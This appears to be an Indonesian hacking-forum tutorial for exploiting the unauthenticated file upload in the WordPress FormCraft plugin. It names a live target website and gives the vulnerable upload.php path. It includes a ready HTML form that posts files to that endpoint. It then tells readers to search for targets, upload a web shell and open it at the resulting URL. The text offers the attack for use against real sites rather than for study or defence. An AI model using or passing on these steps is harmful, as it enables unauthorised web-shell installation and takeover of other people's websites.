Live Target : http://quiropracticoqro.com/
Exploit :
Code:
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/Script CSRF :
Code:
<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>*Save As .html
Cari target menggunakan dork di atas
Lalu masukkan exploit yang di atas
Jika Vuln akan nampak seperti ini
Vuln :[/color
![[Image: image.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tcA4Hi7ZlwmaY22P5c1KajqIVkAL5Ba83tm_ql9H2HXC2m6W_UXrHZVdCQb_SUu4ediE2IKAhbCA4N8K1ExaL4W17yxdTO0C6vbVc_WQ=s0-d)
Sekarang tinggal edit targetnya di Script CSRF yang tadi ..
Sekarang buka filenya dengan browser yang mastah gunakan
Lalu upload deh shell kesangannya
Setelah upload maka akan nampak seperti ini
![[Image: Screenshot_1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uPy46d-ic_o3MVw6de1pYcDn0KpESuaOZYUFLxGVmMLUEJzdGrpuhV6HI9q5GPzIB0FxawmKKOuW0m906hD6gbFnTY8YLTqux3qh6-sfkkNwg7SA=s0-d)
Shell Access : http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php
Jika Berhasil Akan Muncul Shell Kesayangan Sobat
:Tapi Jika Ga Muncul Berarti Sobat Kurang Ganteng Kata Mr. DellatioNx196
Sekian, Semoga bermanfaat
Wassalamualaikum
